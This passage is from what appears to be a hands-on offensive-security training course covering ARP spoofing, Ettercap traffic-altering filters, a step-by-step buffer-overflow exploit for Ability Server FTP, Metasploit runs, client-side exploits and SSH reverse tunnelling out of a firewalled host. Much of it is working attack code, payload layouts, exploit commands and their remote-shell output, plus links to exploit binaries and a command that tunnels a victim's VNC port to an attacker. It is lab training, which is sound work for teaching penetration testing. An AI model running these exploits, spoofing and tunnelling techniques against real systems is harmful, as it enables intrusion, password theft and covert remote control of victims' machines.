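# them. IPs are from the walkthrough (victim .151, gateway .138); MACs are made up.
SAMPLE_REPLIES = [
    (0.0, "192.168.1.138", "00:11:22:33:44:01"),   # genuine gateway reply
    (0.5, "192.168.1.151", "00:11:22:33:44:02"),   # genuine victim reply
    (10.0, "192.168.1.138", "00:aa:bb:cc:dd:ee"),  # attacker claims the gateway's IP
    (10.0, "192.168.1.151", "00:aa:bb:cc:dd:ee"),  # attacker claims the victim's IP too
    (12.0, "192.168.1.138", "00:aa:bb:cc:dd:ee"),  # spoofed reply repeated
    (14.0, "192.168.1.138", "00:aa:bb:cc:dd:ee"),  # third repeat inside the window
]

# Constructed "arp -a" snapshots of the victim's cache before and after the attack.
SAMPLE_BEFORE = {"192.168.1.138": "00:11:22:33:44:01"}
SAMPLE_AFTER = {"192.168.1.138": "00:aa:bb:cc:dd:ee"}

if __name__ == "__main__":
    for alert in ArpWatch("192.168.1.138").run(SAMPLE_REPLIES):
        print(alert)
    print(diff_arp_tables(SAMPLE_BEFORE, SAMPLE_AFTER))
```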


ARP Spoofing the Hard Way - Exercise

Duration: 25 mins

PreRequisites: Instructor Demo

Goals:

1. Work with a partner, and respectively play the role of attacker and victim. Attempt to sniff cleartext FTP passwords from the victim by initiating an ARP spoofing attack.

2. Once the attack is in progress, check the following:

  • Victim ARP Cache
  • Victim Traceroute to the Internet

What do you notice? Why does this happen ?

3. Experiment with the other dsniff package tools, in particular webspy and mailsnarf.

Solution: To be demonstrated by Instructor

Advanced MITM - the Easy Way

Automated tools for MITM attacks make them easy to carry out. We will look at Cain & Abel (Win32) and Ettercap (*nix).

Cain & Abel

Cain & Abel allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using Dictionary & Brute-Force attacks, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.


It also has ARP poisoning and spoofing capabilities, making it an extremely powerful hacking or auditing tool.

Check out The Cain and Abel Demo (http://www.hackingdefined.com/downloads/apr-intro.swf), and the Online Manual (http://www.oxid.it/ca_um/).


We discover the computers in the subnet by MAC address scanning:


( Hosts Tab : File -> Add to List )


We then choose the Victim and Target machines:


( APR Tab, "+" sign )


And happily collect our passwords:


( Passwords Tab )


The simplicity of this tool is unnerving.

DNS Spoofing

Experiment with the DNS spoofing features of Cain and Abel. How does this work?

HTTPS Mitm Attacks

Experiment with the HTTPS features of Cain and Abel. How does this work?

Advanced MITM - Exercise

Duration: 15 mins

PreRequisites: Instructor Demo

Goals:

1. Work with a partner, and respectively play the role of attacker and victim. Attempt to sniff HTTPS passwords from the victim by initiating an ARP spoofing attack.

2. Use DNS spoofing to redirect the victim to an alternate URL. Does this attack work for you? Under what circumstances ?

Solution: To be demonstrated by Instructor

Ettercap

Ettercap is a suite for man in the middle attacks on a LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis.

Ettercap MITM Walkthrough

Don't forget to enable IP forwarding...

#echo 1 > /proc/sys/net/ipv4/ip_forward
  • Sniff -> Unified Sniffing
  • Hosts -> Scan for Hosts
  • Hosts -> Hosts List


  • Add victim to "Target 1" and Destination to "Target 2".
  • MITM -> ARP Poisoning (Sniff Remote Connections)
  • Start -> Start Sniffing



Ettercap Filters

Ettercap can be extended by using filters and plug-ins, enabling a variety of sophisticated attacks. One of the features that makes this tool so versatile is the ability to create your own filters. The following example will replace the word "hired" with "fired" in the HTTP stream of the victim.


We start by creating our own filter:


############################################################################
#                                                                          #
#  ettercap -- muts.filter --                                              #
#                                                                          #
############################################################################

##
#  This filter will substitute the word 'hired' with 'fired' in http traffic
#  and will log the content of the packet in /tmp/fired.users.http.log
## 

if (ip.proto == TCP && tcp.src == 80)  {
    log(DATA.data, "/tmp/fired.users.http.log");
    replace("hired", "fired");
    msg("User Fired!.\n");
}

When ready, we compile it using etterfilter:

root# etterfilter muts.filter -o muts.ef

etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
12 protocol tables loaded:
       DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
11 constants loaded:
       VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
Parsing source file 'muts.filter'  done.
Unfolding the meta-tree  done.
Converting labels to real offsets  done.
Writing output to 'muts.ef'  done.
-> Script encoded into 7 instructions.
root#

We then run Ettercap with the new filter (I prefer to do this from the command line):

root# ettercap -T -q -F muts.ef -M ARP /192.168.1.151/ //

Output:

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from muts.ef...
Listening on eth0... (Ethernet)

  eth0 ->       00:06:1B:CC:00:FA     192.168.1.172     255.255.255.0 

Privileges dropped to UID 65534 GID 65534...

 28 plugins
 39 protocol dissectors
 53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

6 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 192.168.1.151 00:50:FC:F6:74:C8

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

User Fired!.
User Fired!.

We can see that our script was executed. Let's look at our log file:

root@slax:~# cat /tmp/fired.users.http.log
HTTP/1.1 200 OK
Date: Tue, 27 Sep 2005 10:36:56 GMT
Server: Apache/2.0.54 (Gentoo/Linux) PHP/4.4.0
Last-Modified: Tue, 27 Sep 2005 10:34:27 GMT
ETag: "5a704-31-6b9232c0"
Accept-Ranges: bytes
Content-Length: 49
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

Hi muts, 
You are hired.
The Boss.

The original word "hired" was substituted with "fired", as we can see in the victim's browser.



From the Ettercap MAN Page:

TARGET SPECIFICATION
There is no concept of SOURCE nor DEST. The two targets are intended to
filter traffic coming from one to the other and vice-versa (since the
connection is bidirectional).

TARGET is in the form MAC/IPs/PORTs. If you want you can omit any of
its parts and this will represent an ANY in that part.
e.g.
"//80" means ANY mac address, ANY ip and ONLY port 80
"/10.0.0.1/" means ANY mac address, ONLY ip 10.0.0.1 and ANY port

MAC must be unique and in the form 00:11:22:33:44:55

IPs is a range of IP in dotted notation. You can specify range with the
- (hyphen) and single ip with , (comma). You can also use ; (semicolon)
to indicate different ip addresses.
e.g.
"10.0.0.1-5;10.0.1.33" expands into ip 10.0.0.1, 2, 3, 4, 5 and
10.0.1.33

PORTs is a range of PORTS. You can specify range with the - (hyphen)
and single port with , (comma). e.g.
"20-25,80,110" expands into ports 20, 21, 22, 23, 24, 25, 80 and 110

NOTE:
you can reverse the matching of the TARGET by adding the -R option to
the command line. So if you want to sniff ALL the traffic BUT the one
coming or going to 10.0.0.1 you can specify "./ettercap -R /10.0.0.1/" 

NOTE:
TARGETs are also responsible of the initial scan of the lan. You can
use them to restrict the scan to only a subset of the hosts in the net-
mask. The result of the merging between the two targets will be
scanned. remember that not specifying a target means "no target", but
specifying "//" means "all the hosts in the subnet".
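As an added example (not Ettercap's own code), here is a Python parser for the TARGET syntax just quoted, with a matcher that applies a parsed target to a packet endpoint and honours the -R reversal. The man page's own strings ("//80", "/10.0.0.1/", "10.0.0.1-5;10.0.1.33", "20-25,80,110") are the inputs it is checked against; allowing a range or comma list in any octet, not just the last, is my assumption about Ettercap's behaviour.

```python
"""Added example, not Ettercap's own code: a parser for the TARGET syntax quoted
from the man page (MAC/IPs/PORTs, empty part = ANY) and a matcher that applies
it to a packet endpoint, including the -R reversal. Per-octet ranges and lists
(e.g. "10.0.0-1.1-5") are an assumption about Ettercap's behaviour."""

import re
from itertools import product

MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$", re.I)


def _expand_numbers(spec, lo, hi):
    """Expand "1-5,9" into {1, 2, 3, 4, 5, 9}, rejecting values outside lo..hi."""
    values = set()
    for part in spec.split(","):
        if "-" in part:
            a, b = (int(x) for x in part.split("-", 1))
            if a > b:
                raise ValueError(f"descending range {part!r}")
            values.update(range(a, b + 1))
        else:
            values.add(int(part))
    if any(v < lo or v > hi for v in values):
        raise ValueError(f"value out of range in {spec!r}")
    return values


def _expand_ips(spec):
    """';' separates addresses; each octet may itself be a range or list."""
    ips = set()
    for entry in spec.split(";"):
        octets = entry.split(".")
        if len(octets) != 4:
            raise ValueError(f"bad IP spec {entry!r}")
        for combo in product(*(sorted(_expand_numbers(o, 0, 255)) for o in octets)):
            ips.add(".".join(str(n) for n in combo))
    return ips


def parse_target(spec):
    """Return {"mac": str|None, "ips": set|None, "ports": set|None}; None = ANY.
    The empty string (no target given) returns None: per the man page's NOTE it
    means "no target", whereas "//" means every host."""
    if spec == "":
        return None
    parts = spec.split("/")
    if len(parts) != 3:
        raise ValueError(f"TARGET must be MAC/IPs/PORTs, got {spec!r}")
    mac, ips, ports = parts
    target = {"mac": None, "ips": None, "ports": None}
    if mac:
        if not MAC_RE.match(mac):
            raise ValueError(f"MAC must look like 00:11:22:33:44:55, got {mac!r}")
        target["mac"] = mac.lower()
    if ips:
        target["ips"] = _expand_ips(ips)
    if ports:
        target["ports"] = _expand_numbers(ports, 1, 65535)
    return target


def matches(target, mac, ip, port, reverse=False):
    """Does the endpoint (mac, ip, port) fall inside target? reverse=True is -R."""
    if target is None:
        hit = False
    else:
        hit = ((target["mac"] is None or target["mac"] == mac.lower())
               and (target["ips"] is None or ip in target["ips"])
               and (target["ports"] is None or port in target["ports"]))
    return hit != reverse


if __name__ == "__main__":
    # The walkthrough's command used /192.168.1.151/ for TARGET1 and // for TARGET2.
    victim = parse_target("/192.168.1.151/")
    print(matches(victim, "00:50:fc:f6:74:c8", "192.168.1.151", 80))   # True
    print(matches(victim, "00:50:fc:f6:74:c8", "192.168.1.1", 80))     # False
```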

Ettercap MITM - Exercise

Duration: 15 mins

PreRequisites: Instructor Demo

Goals:

1. Work with a partner, and respectively play the role of attacker and victim. Attempt to alter the victim's traffic to your liking. You may simply re-create the attack above. If using HTTP traffic, make sure not to get caught up in "cache" problems...

Solution: To be demonstrated by Instructor

Buffer Overflows

Buffer Overflow Case Study - Ability Server

A vulnerability was reported in the Ability Server in the FTP service. A remote authenticated user can execute arbitrary code on the target system. K-Otik posted an exploit by muts from whitehat.co.il that indicates that there is a buffer overflow in the processing of the FTP STOR command.

Impact: A remote authenticated user may be able to execute arbitrary code on the target system with the privileges of the FTP service.

Setting up Ability Server

If you are running another FTP service (such as Microsoft FTP server), make sure you disable it, or change the server port.



Set up and test Ability Server manually by trying to log on with a valid username and password.



I recommend making shortcuts to both Ability Server and OllyDbg on the desktop, for easy access.


Test the server for a successful logon, with the username and password set in the previous step (default ftp:ftp).



Verifying the Overflow in the STOR command

1. Copy and modify the following template (written in Python). This script will log into the FTP server, and send 1300 A's together with the STOR command.

from ftplib import FTP
import sys

# Edit the IP, username and password.
TARGET = '127.0.0.1'
buffer = '\x41' * 1600          # a long run of 'A' characters

try:
    ftp = FTP(TARGET)
    ftp.login('ftp', 'ftp')
except Exception:
    print("\nCould not connect to FTP server.")
    sys.exit(1)

try:
    # The oversized STOR argument is what triggers the overflow.
    print("\nEvil buffer sent...")
    ftp.transfercmd("STOR " + buffer)
except Exception:
    print("\nDone.")


Once the script is run, Ability Server should crash.

2. Restart Ability Server and OllyDbg.

3. Attach to the Ability Server process using OllyDbg (don't forget to press F9 to release the process).

4. Run the script again, and you should see Olly catch the exception. Examine the top right registers carefully.



We see 2 interesting things:

  • EIP has been completely overwritten with our user input.
  • ESP points to our User Input.


Finding out which bytes overwrite EIP

Now we need to find out which 4 bytes of the 1300 are the ones that overwrite our EIP. We want to know this, as EIP is responsible for the program's execution flow: EIP points to where the program is meant to return to after ending the current function.

This means that by correctly manipulating EIP, we can point the program to an unintended area in the memory space and execute code of our choice.

We can find out exactly which bytes overwrite the EIP by playing a game...

If I were to ask you to guess a number I thought of, between 1 and 100, our conversation would be similar to this (assuming the number chosen was 73):

student > 50
mati    > Bigger
student > 75
mati    > Smaller
student > 65
mati    > Bigger
student > 70
mati    > Bigger
student > 73
mati    > Correct!

In the same manner, we can find out where EIP is overwritten. We'll send out 650 A's and 650 B's (instead of 1300 A's), and see if EIP is overwritten by A's or B's.

If for example, the EIP is now overwritten by B's, we know the overwrite is in between the 650th byte and the 1300th byte.

We'll continue this process by sending out 650 A's, 325 B's and 325 C's (instead of 650 A's and 650 B's), and checking which characters overwrite EIP...

Please note that there are other much quicker ways of finding out where the EIP has been overwritten, however using this method better explains the process.

You should come close to the following values:

buffer = '\x41'*965+'\x42'*3+'\x43'*3+'\x44'*3+'\x45'*3+'\x46'*300

Once this buffer is sent, olly shows the following output:



It seems EIP is overwritten exactly after 966 bytes. Please note that you may get different results. I've seen situations where it takes 970 (local exploitation).
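The guessing game above, as an added example that is not code from this page: a Python function that drives the bisection automatically against a "crash oracle". The oracle here is a stand-in that simulates the overflow landing at a chosen offset (in practice it would be the debugger's EIP read after each crash), and a small helper shows the little-endian packing of a return address that the "Jumping to ESP" step below relies on.

```python
"""Added example, not code from the Hacking Defined page: the "guess my number"
bisection, automated against a crash oracle. make_fake_oracle() stands in for
the real target (a debugger reading EIP after each crash) by simulating an
overflow whose saved return address is taken from a chosen offset."""

import struct


def make_fake_oracle(true_offset, total_len=1300):
    """Simulate a target where EIP ends up holding buf[true_offset:true_offset+4].
    Returns None (no crash) if the buffer is too short to reach that spot."""
    def oracle(buf):
        if len(buf) < true_offset + 4:
            return None
        return buf[true_offset:true_offset + 4]
    return oracle


def find_eip_offset(oracle, total_len=1300, lo_byte=b"A", hi_byte=b"B"):
    """Find the offset of the 4 bytes that land in EIP by bisection.

    Each round sends lo_byte * mid + hi_byte * (total_len - mid) and reads EIP:
      all lo_byte -> the overwrite lies entirely before mid
      all hi_byte -> it starts at or after mid
      a mixture   -> it straddles mid, so offset = mid - (number of lo_byte)
    Returns the offset, or None if the target never crashed."""
    first = oracle(lo_byte * total_len)
    if first is None:
        return None
    if first != lo_byte * 4:
        raise ValueError("EIP holds bytes that are not ours: %r" % first)
    lo, hi = 0, total_len            # the offset is somewhere in [lo, hi)
    while hi - lo > 1:
        mid = (lo + hi) // 2
        eip = oracle(lo_byte * mid + hi_byte * (total_len - mid))
        if eip is None:
            raise ValueError("target stopped crashing during the search")
        n_lo, n_hi = eip.count(lo_byte), eip.count(hi_byte)
        if n_lo + n_hi != 4:
            raise ValueError("EIP holds bytes that are not ours: %r" % eip)
        if n_lo == 4:
            hi = mid - 3                 # offset + 4 <= mid
        elif n_hi == 4:
            lo = mid
        else:
            return mid - n_lo            # straddles mid: exact answer in one shot
    return lo


def pack_return_address(addr):
    """Little-endian encode a 32-bit address, the byte order x86 stores it in:
    0x77E14C29 (the first jmp esp found in user32.dll) -> b'\\x29\\x4c\\xe1\\x77'."""
    return struct.pack("<I", addr)


if __name__ == "__main__":
    # Simulate the page's result: EIP overwritten after 966 bytes of a 1300-byte buffer.
    print(find_eip_offset(make_fake_oracle(966)))          # 966
    print(pack_return_address(0x77E14C29).hex())           # 294ce177
```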

Diving in Deeper

Let's look deeper into this crash. Clicking on the ESP register -> Follow in Dump shows the following:



  • You'll notice that ESP points to our overwritten "F"'s. Approximately 16 bytes before that, our EIP is overwritten.
  • We can "bridge" those 16 bytes by overwriting them with NOPs (the no-operation instruction). A NOP has the value "\x90".
  • If you check how many "F"'s are present in memory, you'll be able to roughly calculate how much space we have for our own code, also known as shellcode.


Using all of this information, we can conclude that we want our exploit to look similar to this:


<---buffer(966)---><--EIP Return Address(4)--><--nop slide(16)--><---shellcode(?)--->


Jumping to ESP

After we've understood the inner workings of how our exploit should be constructed, we need to find a way to get EIP to point to the beginning of our shellcode.

ESP points (roughly) to the beginning of our shellcode, so if we can perform a JMP ESP instruction, we should be OK. How do we do this?

What we need to do in this case is look for a JMP ESP instruction in one of the system's core DLLs, such as kernel32.dll or ntdll.dll. If we find a JMP ESP inside the memory space of one of these DLLs, we can point EIP to that address, thus executing the JMP ESP. Once this instruction is executed, we should be at the beginning of our shellcode.

We can use the findjmp2 tool to find JMP ESP in core DLLs:

C:\>findjmp2 user32.dll esp

Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
Scanning user32.dll for code useable with the esp register
0x77E14C29      jmp esp
0x77E3C256      jmp esp
0x77E56F43      push esp - ret
Finished Scanning user32.dll for code useable with the esp register
Found 3 usable addresses

C:\>


We can see that several "jmp esp" instructions have been found in user32.dll. We'll use the first one, and overwrite EIP with this address. Our new buffer should look like this (note that the address is entered backwards, due to the little-endian architecture):


buffer = '\x41'*966+'\x29\x4c\xe1\x77'+'\x90'*16+sc

Shellcode

Writing custom shellcode is not in the scope of this course. For a beginners tutorial, try http://www.acm.uiuc.edu/sigmil/talks/shellcode/shellcode.html.

For our example, we will be using "Ready Made" shellcode, which can be found on the metasploit site: http://metasploit.com:55555/PAYLOADS.



We choose a standard bindshell on port 4444 to use with our example.



Ability Server Buffer Overflow - Exercise

Duration: 95 mins

PreRequisites: Instructor Demo

Goals:

1. Using the tools described, write a working exploit for ability server. Answer the following questions:

  • Which FTP command is vulnerable to the overflow?
  • After how many bytes is EIP overwritten?
  • Which CPU registers can we use to get to our shellcode?
  • How much space do we have for the shellcode?

2. The instructor will provide a vulnerable program which you will fuzz, research, and write an exploit for.

Solution: To be demonstrated by Instructor

Metasploit Framework

The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. This project initially started off as a portable network game and has evolved into a powerful tool for penetration testing, exploit development, and vulnerability research.


The Framework was written in the Perl scripting language and includes various components written in C, assembler, and Python. The widespread support for the Perl language allows the Framework to run on almost any Unix-like system under its default configuration. A customized Cygwin environment is provided for users of Windows-based operating systems. The project core is dual-licensed under the GPLv2 and Perl Artistic Licenses, allowing it to be used in both open-source and commercial projects.


This project can be roughly compared to commercial offerings such as Immunity's CANVAS and Core Security Technology's Impact. The major difference between the Framework and these commercial products is the focus; while the commercial products need to always provide the latest exploits and an intuitive GUI, the Framework was designed to facilitate research and experimentation with new technologies.

MSF Cli

muts@vaio ~
$ cd framework

muts@vaio ~/framework
$ ./msfcli ms05_039_pnp RHOST=192.168.1.161 PAYLOAD=win32_bind TARGET=0 E
[*] Starting Bind Handler.
[*] Detected a Windows 2000 target ()
[*] Sending 1 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 192.168.1.152:2727 <-> 192.168.1.161:4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

MSF Console


                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 


+ -- --=[ msfconsole v2.4 [100 exploits - 75 payloads]

msf > use ms05_039_pnp
msf ms05_039_pnp > set RHOST 192.168.1.161
RHOST -> 192.168.1.161
msf ms05_039_pnp > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf ms05_039_pnp(win32_bind) > set TARGET 0
TARGET -> 0
msf ms05_039_pnp(win32_bind) > show options 

Exploit and Payload Options
===========================

 Exploit:    Name       Default          Description
 --------    -------    -------------    --------------------------------------
 required    RHOST      192.168.1.161    The target address
 required    SMBPIPE    browser          Pipe name: browser, srvsvc, wkssvc
 optional    SMBDOM                      The domain for specified SMB username
 required    RPORT      139              The target port
 optional    SMBUSER                     The SMB username to connect with
 optional    SMBPASS                     The password for specified SMB username

 Payload:    Name        Default    Description
 --------    --------    -------    ------------------------------------------
 required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
 required    LPORT       4444       Listening port for bind shell

 Target: Windows 2000 SP0-SP4

msf ms05_039_pnp(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows 2000 target ()
[*] Sending 1 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 192.168.1.152:2704 <-> 192.168.1.161:4444 

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp. 

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

       Connection-specific DNS Suffix  . : lan
       IP Address. . . . . . . . . . . . : 192.168.1.161
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
       Default Gateway . . . . . . . . . : 192.168.1.138
C:\WINNT\system32>


MSF Web




Metasploit Framework - Excercise

Duration: 20 mins

PreRequisites: Instructor Demo

Goals:

1. Use the Metasploit Framework to exploit a known vulnerability, and upload nc.exe to the victim. Do this in the most efficient way possible, using Meterpreter.

2. Experiment with the Web, CLI and Console interfaces of Metasploit. Which do you like most?

Core Impact Framework

  • Exercises


Vulnerability Scanners

Command Line Vulnerability Scanners

C:\tools>dfind

       ================================================[rev-1.0.5]==
       ==============DFind - #1 Tiny Security Scanner===============
       ============multi-threaded for Linux and Windows=============
       =============================================================
                                 MAIN MENU
       =============================================================

[+] Usage: DFind <Option> <Syntax>
[+] <Option>:
       _______________________________________________________
       |___-p___|___+p___|___-pu__|__-ban__|__-web__|__-dde__|
       _______________________________________________________
       |__-rad__|__-wns__|_-http__|_-sock__|__-ipc__|__-nbn__|

[+] Type DFind <Option> to look the <Syntax>
[+] Number of possibles usages: 683

Shadow Security Scanner

  • Exercises

Nessus Vulnerability Scanner

  • Exercises

Client Side Attacks


Internet Explorer Remote Command Execution Exploit (MS05-001)

http://www.hackingdefined.com/tools/tools/Tools/Exploits/CMDexe-XP-SP12.rar


src=\\\"http://freehost19.websamba.com/shreddersub7/htm.txt


<param name=item1 value=',cmd.exe,/c pause,'>



Internet Explorer Object Type Overflow



Windows JPEG GDI+ (MS04-028)



C:\>jpg.exe -r 192.168.1.151 -p 53 fun.jpg
+------------------------------------------------+
|  JpegOfDeath - Remote GDI+ JPEG Remote Exploit |
|    Exploit by John Bissell A.K.A. HighT1mes    |
|           TweaKed By M4Z3R For GSO             |
|              September, 23, 2004               |
+------------------------------------------------+
 Exploit JPEG file fun.jpg has been generated!

C:\>nc -lvp 53
listening on [any] 53 ...
connect to [192.168.1.151] from XPSP1 [192.168.1.157] 1063
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\see>

http://www.hackingdefined.com/tools/tools/Tools/Exploits/MS04-028.c

MS Internet Explorer COM Objects File Download Exploit

http://www.hackingdefined.com/tools/tools/Tools/Exploits/MS05-038.c


d:\tools>MS05-038.exe http://www.hackingdefined.com/calc.exe

========================================
Ms05-038 exploit POC
Write By Zwell
2005-8-11
http://www.donews.net/zwell
zwell@sohu.com
========================================

[+] download url:http://www.hackingdefined.com/calc.exe
[+] Build shellcode successful
[+] Build file successful
Now, you can open the builded file(zwell_ms05038.html) with IE to see the  result.Good Luck ^_^

d:\tools>

Traffic Redirection

Port Redirection

  • Exercises

Fpipe / Winrelay / Rinetd

  • Exercises

Stunnel

Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL (Secure Sockets Layer) available on both Unix and Windows. Stunnel can allow you to secure non-SSL aware daemons and protocols (like POP, IMAP, LDAP, etc) by having Stunnel provide the encryption, requiring no changes to the daemon's code.

Install and Configure Stunnel

http://www.hackingdefined.com/downloads/stunnel.rar

Create a folder called C:\stunnel and place the Stunnel executable, libssl32.dll, libeay32.dll and stunnel.pem files in it.

Create a file called stunnel.conf. Use the following client template as a reference:

client = yes
[pop3s]
accept = 127.0.0.1:1109
connect = pop3s.myisp.com:995 

[imaps]
accept = 127.0.0.1:1439
delay = yes
connect = imaps.myisp.com:993

[smtps]
accept = 127.0.0.1:259
connect = smtps.myisp.com:465


Port Tunnelling - SSH

SSH tunnelling is one of the more advanced techniques to infiltrate a firewalled host. This technique goes hand in hand with a client side attack, as we are able to expose ports on an internal victim, to our own (external) attacking machine.

SSH (or Secure SHell) is a protocol for creating a secure connection between two systems. In the SSH protocol, the client machine initiates a connection with a server machine.

The following safeguards are provided by SSH:

  • After an initial connection, the client verifies it is connecting to the same server during subsequent sessions.
  • The client transmits its authentication information to the server, such as a username and password, in an encrypted format.
  • All data sent and received during the connection is transferred using strong, 128 bit encryption, making it extremely difficult to decrypt and read.
  • The client has the ability to use X11 applications launched from the shell prompt. This technique, called X11 forwarding, provides a secure means to use graphical applications over a network.

Because the SSH protocol encrypts everything it sends and receives, it can be used to secure otherwise insecure protocols. Using a technique called port forwarding, an SSH server can become a conduit to secure insecure protocols, like POP, increasing overall system and data security.

The SSH protocol has the concept of channels within an SSH connection, meaning you can have more than one communication channel within one SSH connection. In SSH terms this is called TCP port forwarding.


SSH Tunnelling – Exercise

Duration: 25 mins

PreRequisites: Instructor Demo; VNC SSH files (http://www.hackingdefined.com/downloads/vnc-ssh.rar); SSH Server win32 (http://www.hackingdefined.com/downloads/Setup-SSH.rar)

(winvnc password - seesec)

Goals:

In this exercise we will simulate an attack on a firewalled web server. The web server will be vulnerable to a buffer overflow. We will upload and install WinVNC on the server, and then tunnel the VNC port (5900) back out to the attacker.

1. Open the IIS - SSL VMware snapshot. Implement Windows TCP/IP port filtering to allow only TCP port 443 on the victim web server.



Port scan the web server to verify the filtering is working as expected.

2. Attack and exploit the victim web server (do some research). Use a method of your choice to upload the winvnc related files and plink.exe (win32 ssh client) to the victim.

3. Once all the files are in place, install WinVNC over the command line:

regedit /s vnc.reg 
winvnc –install
net start winvnc

4. Verify that the SSH server on the attacking computer is working, and accepts connections. Create an SSH tunnel from the victim to the attacker, and tunnel out port 5900.

plink.exe -l administrator -pw password -C -R 5900:127.0.0.1:5900 <attacker ip>

5. Check the attacking computer for the port tunnel. Is port 5900 listening?

Connect locally to port 5900 with the tightvnc client. The password is seesec.

6. Use a sniffer to determine what traffic is flowing between the web server and the attacker.

7. What implications does this have in a corporate network? What dangers does it present? How can these dangers be dealt with?


Related demo : http://www.hackingdefined.com/movies/ssh-dcom/see-sec-ssh-dcom-tunneling.zip


DOS / DDOS


Methods of attack

A DoS attack can be perpetrated in a number of ways. There are three basic types of attack:

  1. consumption of computational resources, such as bandwidth, disk space, or CPU time
  2. disruption of configuration information, such as routing information
  3. disruption of physical network components

Nuke Attacks

A Nuke attack sends a packet, usually ICMP, which is malformed or fragmented in an invalid way, triggering a bug in the operating system and crashing the targeted computer. This is known as the ping of death.

Buffer Overflows DOS

Various DoS-causing exploits can cause server software to get confused and fill the disk space or consume all available memory or CPU time.

Flooding the target

Other kinds of DoS rely primarily on brute force, flooding the target with an overwhelming flux of packets, oversaturating its connection bandwidth or depleting the target's system resources. Bandwidth-saturating floods rely on the attacker having more bandwidth available than the victim; a common way of achieving this today is via Distributed Denial of Service, employing a botnet. Other floods may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim's disk space with logs.

Ping Floods

A ping flood sends the victim an overwhelming number of ping packets, usually using the "ping -f" command. It is very simple to launch, and a T1 owner can easily defeat a dial-up user.

SYN Floods

A SYN flood sends a flood of TCP/SYN packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to spawn a half-open connection by sending back a TCP/SYN-ACK packet and waiting for a TCP/ACK packet in response from the sender address. However, because the sender address is forged, the response never comes. These half-open connections saturate the number of available connections the server is able to make, keeping it from responding to legitimate requests until after the attack ends.

Smurf Attacks

A smurf attack is one particular variant of a flooding DoS attack on the public Internet. It relies on mis-configured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than a specific machine. The network then serves as a smurf amplifier. In such an attack, the perpetrators will send large numbers of IP packets with a faked source address that is set to the address of the intended victim. To combat Denial of Service attacks on the Internet, services like the Smurf Amplifier Registry have given network service providers the ability to identify misconfigured networks and to take appropriate action such as filtering.

Banana Attack

A "banana attack" is another particular type of DoS. It involves redirecting outgoing messages from the client back onto the client, preventing outside access, as well as flooding the client with the sent packets.

Flood Attacks

Attempts to "flood" a network with bogus packets, thereby preventing legitimate network traffic, are the most common form of attack, often conducted by disrupting network connectivity with the use of multiple hosts in a distributed denial-of-service attack or DDoS. Specific means of attack include: a smurf attack, in which excessive ICMP requests are broadcast to an entire network; bogus HTTP requests on the World Wide Web; incorrectly formed packets; and random traffic. The source addresses of this traffic are usually spoofed in order to hide the true origin of the attack. Due to this and the many vectors of attack, there are no comprehensive rules that can be implemented on network hosts in order to protect against denial-of-service attacks, and it is a difficult feat to determine the source of the attack and the identity of the attacker. This is especially true with distributed attacks.

Attacks can be directed at any network device, including attacks on routing devices and Web, electronic mail, or Domain Name System servers.

Effects of DoS

Denial of Service attacks can also lead to problems in the network 'branches' around the actual computer being attacked. For example, the bandwidth of a router between the Internet and a LAN may be consumed by a DoS, meaning not only will the intended computer be compromised, but the entire network will also be disrupted.

If the DoS is conducted on a sufficiently large scale, entire geographical swathes of Internet connectivity can also be compromised by incorrectly configured or flimsy network infrastructure equipment without the attacker's knowledge or intent. For this reason, most, if not all, ISPs ban the practice.

DDOS - Exercise

Duration: 20 mins

PreRequisites: Patience

Goals:

1. Read http://grc.com/dos/drdos.htm. I know it's long...but you'll thank me at the end.

2. Wicked talks back! (http://www.hackingdefined.com/downloads/wiked.txt)

Password Attacks

Weak passwords remain at the top of the list in security breaches.

Password Bruteforce Attacks (online)

